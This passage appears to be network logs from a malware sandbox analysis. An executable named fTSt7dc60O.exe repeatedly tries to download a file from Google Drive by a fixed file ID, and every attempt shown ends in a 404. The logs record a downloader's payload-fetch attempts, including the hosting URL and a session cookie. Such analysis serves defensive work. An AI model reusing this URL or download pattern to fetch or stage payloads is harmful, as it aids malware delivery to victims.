                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Content-Length: 1652
                                                    Server: UploadServer
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Content-Security-Policy: sandbox allow-scripts
                                                    Connection: close
                                                    2025-01-10 14:39:21 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="4n4OYErp-6l-B3NrJWSntA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    16 | 192.168.2.7 | 52119 | 172.217.18.14 | 443 | 4640 | C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    2025-01-10 14:39:21 UTC | 417 | OUT | GET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Host: drive.google.com
                                                    Cache-Control: no-cache
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:39:22 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                    Content-Type: application/binary
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:39:22 GMT
                                                    Location: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download
                                                    Strict-Transport-Security: max-age=31536000
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy: script-src 'nonce-mf5z1FABYyJM2S7M14NUew' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Server: ESF
                                                    Content-Length: 0
                                                    X-XSS-Protection: 0
                                                    X-Frame-Options: SAMEORIGIN
                                                    X-Content-Type-Options: nosniff
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Connection: close


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    17 | 192.168.2.7 | 52128 | 142.250.186.161 | 443 | 4640 | C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    2025-01-10 14:39:22 UTC | 459 | OUT | GET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Cache-Control: no-cache
                                                    Host: drive.usercontent.google.com
                                                    Connection: Keep-Alive
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:39:23 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                    X-GUploader-UploadID: AFIdbgRuAENb4Xc5vjZb_gZTGp5BHMRdfak_SUIp7LWcCMnZ1-7ssk5nzrlIim4E_FHp6j9zyIEQeLA
                                                    Content-Type: text/html; charset=utf-8
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:39:23 GMT
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy: script-src 'nonce-2UuSLVTw0_P940hhDbxR1A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Content-Length: 1652
                                                    Server: UploadServer
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Content-Security-Policy: sandbox allow-scripts
                                                    Connection: close
                                                    2025-01-10 14:39:23 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="5uMi9exH-afPpH4N2ckRaQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    18 | 192.168.2.7 | 52138 | 172.217.18.14 | 443 | 4640 | C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    2025-01-10 14:39:24 UTC | 417 | OUT | GET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Host: drive.google.com
                                                    Cache-Control: no-cache
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:39:24 UTC  1920  IN  HTTP/1.1 303 See Other
                                                    Content-Type: application/binary
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:39:24 GMT
                                                    Location: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download
                                                    Strict-Transport-Security: max-age=31536000
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Content-Security-Policy: script-src 'nonce-yjf1uN9aRir7r78SGxORyw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Server: ESF
                                                    Content-Length: 0
                                                    X-XSS-Protection: 0
                                                    X-Frame-Options: SAMEORIGIN
                                                    X-Content-Type-Options: nosniff
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Connection: close


                                                    Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                    19  192.168.2.7  52147  142.250.186.161  443  4640  C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    Timestamp  Bytes transferred  Direction  Data
                                                    2025-01-10 14:39:25 UTC  459  OUT  GET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Cache-Control: no-cache
                                                    Host: drive.usercontent.google.com
                                                    Connection: Keep-Alive
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:39:25 UTC  1851  IN  HTTP/1.1 404 Not Found
                                                    X-GUploader-UploadID: AFiumC6dil4cMFJrtfkmnuuz09E-0PjXegF0f1dgqZfhFEa10L6SnhfFcq9XsEjVdY95bndjSU1gVhM
                                                    Content-Type: text/html; charset=utf-8
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:39:25 GMT
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy: script-src 'nonce-ejuoyyGMeroZSQIu0Rdrgg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Content-Length: 1652
                                                    Server: UploadServer
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Content-Security-Policy: sandbox allow-scripts
                                                    Connection: close
                                                    2025-01-10 14:39:25 UTC  1652  IN
                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="84HW-_-f00lAVenwoPP0Vg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                    Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                    20  192.168.2.7  52155  172.217.18.14  443  4640  C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    Timestamp  Bytes transferred  Direction  Data
                                                    2025-01-10 14:39:26 UTC  417  OUT  GET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Host: drive.google.com
                                                    Cache-Control: no-cache
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:39:27 UTC  1920  IN  HTTP/1.1 303 See Other
                                                    Content-Type: application/binary
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:39:27 GMT
                                                    Location: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download
                                                    Strict-Transport-Security: max-age=31536000
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy: script-src 'nonce-UInas9lethOfb0Pe_fC-Rg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Server: ESF
                                                    Content-Length: 0
                                                    X-XSS-Protection: 0
                                                    X-Frame-Options: SAMEORIGIN
                                                    X-Content-Type-Options: nosniff
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Connection: close


                                                    Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                    21  192.168.2.7  52164  142.250.186.161  443  4640  C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    Timestamp  Bytes transferred  Direction  Data
                                                    2025-01-10 14:39:27 UTC  459  OUT  GET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Cache-Control: no-cache
                                                    Host: drive.usercontent.google.com
                                                    Connection: Keep-Alive
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:39:28 UTC  1851  IN  HTTP/1.1 404 Not Found
                                                    X-GUploader-UploadID: AFIdbgQyw8c0aB7IKG6fgmoi4mLTn6dLoR_190lO2KpaABfwgYJ2YVEvVovcC5Dwg-GikJMaFgwrIfc
                                                    Content-Type: text/html; charset=utf-8
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:39:28 GMT
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Content-Security-Policy: script-src 'nonce-Mabm5OnitgiM2uhjC9aruQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Content-Length: 1652
                                                    Server: UploadServer
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Content-Security-Policy: sandbox allow-scripts
                                                    Connection: close
                                                    2025-01-10 14:39:28 UTC  1652  IN
                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Hui3pNvtTG2NzY7hrUPnCQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                    Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                    22  192.168.2.7  52172  172.217.18.14  443  4640  C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    Timestamp  Bytes transferred  Direction  Data
                                                    2025-01-10 14:39:29 UTC  417  OUT  GET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Host: drive.google.com
                                                    Cache-Control: no-cache
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:39:29 UTC  1920  IN  HTTP/1.1 303 See Other
                                                    Content-Type: application/binary
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:39:29 GMT
                                                    Location: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download
                                                    Strict-Transport-Security: max-age=31536000
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Content-Security-Policy: script-src 'nonce-qZ0xFFcnRwNQBRZCzq0MYQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Server: ESF
                                                    Content-Length: 0
                                                    X-XSS-Protection: 0
                                                    X-Frame-Options: SAMEORIGIN
                                                    X-Content-Type-Options: nosniff
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Connection: close


                                                    Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                    23  192.168.2.7  52180  142.250.186.161  443  4640  C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    Timestamp  Bytes transferred  Direction  Data
                                                    2025-01-10 14:39:30 UTC  459  OUT  GET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Cache-Control: no-cache
                                                    Host: drive.usercontent.google.com
                                                    Connection: Keep-Alive
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:39:30 UTC  1844  IN  HTTP/1.1 404 Not Found
                                                    X-GUploader-UploadID: AFIdbgTbDWjoKmBbO6aCQISLuiQ7MrgbDoThX2g5OEXAH0mF79-45jnd-0eKfY0oa53So3zp
                                                    Content-Type: text/html; charset=utf-8
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:39:30 GMT
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy: script-src 'nonce-pkb7fki7ef9BTuVoMbMwvQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Content-Length: 1652
                                                    Server: UploadServer
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Content-Security-Policy: sandbox allow-scripts
                                                    Connection: close
                                                    2025-01-10 14:39:30 UTC  1652  IN
                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="AidjwCNmXMmR_foc4TSItg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                    Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                    24  192.168.2.7  52186  172.217.18.14  443  4640  C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    Timestamp  Bytes transferred  Direction  Data
                                                    2025-01-10 14:39:31 UTC  417  OUT  GET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Host: drive.google.com
                                                    Cache-Control: no-cache
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:39:31 UTC  1920  IN  HTTP/1.1 303 See Other
                                                    Content-Type: application/binary
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:39:31 GMT
                                                    Location: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download
                                                    Strict-Transport-Security: max-age=31536000
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
